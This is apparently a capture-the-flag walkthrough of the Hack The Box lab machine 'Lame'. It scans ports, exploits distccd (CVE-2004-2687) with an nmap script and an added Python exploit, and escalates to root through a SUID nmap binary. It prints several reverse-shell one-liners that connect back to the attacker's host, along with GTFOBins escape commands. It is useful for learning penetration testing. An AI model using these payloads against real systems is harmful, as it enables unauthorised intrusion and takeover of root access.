Lame

About Lame

Lame is a beginner-level machine that needs only one exploit to obtain root access. It was the first machine published on Hack The Box and, until its retirement, was often the first box new users attempted.

Enumeration

rustscan

rustscan is a fast port scanner that sweeps every TCP port and then hands the open ones to Nmap. To scan 10.10.10.3, the command is:

rustscan -a 10.10.10.3

The -a flag takes the address (or addresses) to scan. rustscan covers all 65,535 TCP ports by default, so no port range has to be given.

Upon executing the command, we receive an output that lists open ports and their corresponding numbers on the target system:

Open 10.10.10.3:21
Open 10.10.10.3:22
Open 10.10.10.3:139
Open 10.10.10.3:3632
Open 10.10.10.3:445

Each line is an open port; the services normally found on those ports are:

  • Port 21: FTP, file transfer.
  • Port 22: SSH, remote administration.
  • Port 139: NetBIOS Session Service, SMB over NetBIOS (Windows file and printer sharing, or Samba on Unix).
  • Port 3632: distcc, the distributed C/C++ compiler daemon.
  • Port 445: SMB directly over TCP (microsoft-ds), again file sharing.

nmap

To identify the services behind these ports and their versions, we turn to Nmap:

nmap 10.10.10.3 -A -p 21,22,139,3632,445 -Pn
  • -A: Aggressive scan, which bundles OS detection, version detection, default NSE scripts and traceroute.
  • -p 21,22,139,3632,445: Restricts the scan to the ports rustscan found open.
  • -Pn: Skips host discovery and treats the host as online, which avoids a false "host down" when ICMP is filtered.

When we execute the command, Nmap provides a wealth of information about the target system’s open ports, services, and more:

Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-13 13:19 CEST
Nmap scan report for 10.10.10.3
Host is up (0.023s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.14
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h00m21s, deviation: 2h49m45s, median: 19s
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2023-07-13T07:19:58-04:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.56 seconds

Anonymous FTP login works (ftp-anon reports code 230), but the directory is empty, so there is nothing to pull from it. The unusual service is distccd on port 3632, so let's find out what it is.

User

https://book.hacktricks.xyz/network-services-pentesting/3632-pentesting-distcc

Exploiting Vulnerabilities: distcc CVE-2004-2687

The HackTricks page points to CVE-2004-2687: a distccd exposed without access restrictions will run whatever command line a client submits. First, start a Netcat listener on the attacking machine (10.10.14.14) so the target has something to connect back to:

nc -lnvp 4444

This listens on TCP port 4444 (-l listen, -n no DNS, -v verbose, -p port) and will receive the reverse shell.

Nmap ships an NSE script for CVE-2004-2687 that asks distccd to execute a command of our choosing; here the command connects back to our listener:

nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687 --script-args="distcc-cve2004-2687.cmd='nc -nv 10.10.14.14 4444 -e /bin/bash'"
  • -p 3632: The port distccd listens on.
  • --script distcc-cve2004-2687: Runs the NSE script for this CVE.
  • --script-args="distcc-cve2004-2687.cmd='nc -nv 10.10.14.14 4444 -e /bin/bash'": The command distccd will run; on Lame the target's netcat supports -e, so it spawns bash and wires it to our listener. The resulting shell runs as the daemon user, not root.
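To see what the NSE script is doing on the wire, here is an added Python example (not part of the original writeup and not Nmap's own code) that builds the same distcc v1 request and parses the daemon's reply. The argv layout follows the one the public exploits use; the target address and the sample `id` output in the test are constructed, not captured from Lame.

```python
"""distcc v1 protocol: build the CVE-2004-2687 request and parse distccd's reply."""
import socket


def _token(name: str, value: int) -> bytes:
    # Every distcc token is a 4-byte name followed by an 8-digit hex length/value.
    return name.encode() + f"{value:08x}".encode()


def build_request(cmd: str) -> bytes:
    """DIST/ARGC/ARGV.../DOTI message that makes an unrestricted distccd run `sh -c cmd`."""
    # distccd executes argv as if it were the compiler. A vulnerable daemon does not
    # check the program name, so argv[0] can be "sh". Everything after the command is
    # only positional parameters to sh; the trailing "-c main.c -o main.o" makes the
    # argv look like a normal compile job to distcc's argument checks.
    argv = ["sh", "-c", cmd, "#", "-c", "main.c", "-o", "main.o"]
    req = _token("DIST", 1) + _token("ARGC", len(argv))
    for arg in argv:
        raw = arg.encode()
        req += _token("ARGV", len(raw)) + raw
    # DOTI carries the preprocessed source; one dummy byte is enough.
    req += _token("DOTI", 1) + b"A"
    return req


def parse_response(data: bytes) -> dict:
    """Walk the DONE, STAT, SERR, SOUT, DOTO tokens of a distccd reply.

    Length-carrying tokens (SERR, SOUT, DOTO) map to their payload bytes; the others
    map to their numeric value, so STAT is the exit status of the command.
    """
    out, i = {}, 0
    while i + 12 <= len(data):
        name = data[i:i + 4].decode("ascii", "replace")
        try:
            val = int(data[i + 4:i + 12], 16)
        except ValueError:
            break
        i += 12
        if name in ("SERR", "SOUT", "DOTO"):
            out[name] = data[i:i + val]
            i += val
        else:
            out[name] = val
    return out


def run_cmd(host: str, port: int, cmd: str, timeout: float = 10.0) -> dict:
    """Send one command to distccd and return the parsed reply (stdout is in SOUT)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(cmd))
        buf = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            buf += chunk
    return parse_response(buf)


if __name__ == "__main__":
    # Assumed target; on Lame this would be 10.10.10.3:3632.
    reply = run_cmd("10.10.10.3", 3632, "id")
    print("exit status:", reply.get("STAT"))
    print(reply.get("SOUT", b"").decode(errors="replace"))
```

`run_cmd` is synchronous and reads until distccd closes the connection, which is fine for short commands such as `id`; for a reverse shell payload the daemon never returns, so use the Nmap script or a fire-and-forget send instead.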

Upgrade the shell

Enhancing Usability: Optimal Reverse Shell

The shell we have is a bare nc -e bash with no terminal. To replace it, first start a second listener on another port:

nc -lnvp 4949

Then, from the first shell on the target, spawn a new reverse shell built around a named pipe. This form does not depend on the target's nc supporting -e:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.14 4949 >/tmp/f

Breaking down the command:

  • rm /tmp/f: Deletes any leftover pipe from a previous attempt.
  • mkfifo /tmp/f: Creates the named pipe.
  • cat /tmp/f|sh -i 2>&1: Feeds whatever arrives in the pipe to an interactive sh, with stderr merged into stdout.
  • nc 10.10.14.14 4949 >/tmp/f: Sends the shell's output to our listener and writes every byte received from it back into the pipe, which closes the loop.

Enhancing Interaction and Usability

With the new connection in place, turn it into a proper terminal (Lame's Python is 2.x, so the plain python binary works):

  • python -c 'import pty;pty.spawn("/bin/bash")': Allocates a pseudo-terminal and runs bash in it, so programs that need a tty (su, sudo, editors) behave.
  • export TERM=xterm: Sets the terminal type so clear and other curses-based commands work.
  • ctrl+z: Suspends the shell and returns to the local terminal.
  • stty raw -echo; fg: Puts the local terminal in raw mode with echo off, so Ctrl-C, Tab completion and arrow keys are passed to the remote pty instead of being handled locally, then resumes the remote shell.

Root

Linux Smart Enumeration (lse.sh) is a Bash script that collects system information and surfaces likely privilege-escalation paths and misconfigurations on a Linux host, among them SUID/SGID binaries, which is the check that matters here.

SETUID Vulnerabilities

SETUID (Set User ID) is a permission bit on Unix-like systems: a program with the bit set runs with the privileges of its owner rather than of the user who launched it, and for system binaries the owner is usually root. A SETUID vulnerability arises when such a program lets the caller spawn a shell or run arbitrary commands, because that shell inherits the owner's effective UID.

GTFOBins is a curated list of Unix binaries and the ways each can be abused (SUID shell escapes included), so it is the first place to look once an unusual SUID binary turns up. Its entry for nmap is:
https://gtfobins.github.io/gtfobins/nmap/
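As an added example (not from the writeup and not lse.sh code), a Python version of the SUID/SGID sweep lse.sh performs, paired with a triage step that matches root-owned SUID binaries against a small hand-typed subset of GTFOBins escapes. The subset, the pruned directories and the tuple format are my assumptions; the full GTFOBins list is far larger.

```python
"""Enumerate SUID/SGID files and flag root-owned ones with a known GTFOBins escape."""
import os
import stat

# Assumption: a hand-picked subset of GTFOBins SUID techniques, keyed by basename.
# Consult https://gtfobins.github.io/ for the current and complete list.
KNOWN_ESCAPES = {
    "nmap": "nmap --interactive, then !sh (interactive mode exists in 2.02 to 5.21)",
    "find": "find . -exec /bin/sh -p \\; -quit",
    "bash": "bash -p",
    "python": "python -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'",
}

# Pseudo-filesystems hold no real binaries and are slow to walk; skip them.
PRUNE = {"/proc", "/sys", "/dev", "/run"}


def find_setuid(root: str = "/") -> list:
    """Return (path, owner_uid, mode) for every regular file with SUID or SGID set."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in PRUNE]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks into other trees
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((path, st.st_uid, st.st_mode))
    return hits


def triage(hits) -> list:
    """Pair each root-owned SUID binary with a GTFOBins escape when its basename is known."""
    findings = []
    for path, uid, mode in hits:
        base = os.path.basename(path)
        if uid == 0 and mode & stat.S_ISUID and base in KNOWN_ESCAPES:
            findings.append((path, KNOWN_ESCAPES[base]))
    return findings


if __name__ == "__main__":
    found = find_setuid("/")
    for path, uid, mode in found:
        print(f"{oct(mode & 0o7777)} uid={uid} {path}")
    for path, how in triage(found):
        print(f"[!] {path}: {how}")
```

The sweep is deliberately unprivileged (it never follows symlinks and swallows permission errors), so it can run from the low-privilege shell obtained through distcc; on Lame the interesting hit is a root-owned nmap binary.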

Nmap, best known for port scanning, also had an interactive mode (present in versions 2.02 through 5.21, and Lame's is old enough) in which you can run shell commands from inside the program. It is entered with:

nmap --interactive

Because the binary is SUID root, anything nmap spawns keeps root's effective UID. From the interactive prompt, the shell escape drops us into a system shell; run id afterwards and expect euid=0(root). Use sh rather than bash here, since bash drops a mismatched effective UID unless started with -p:

!sh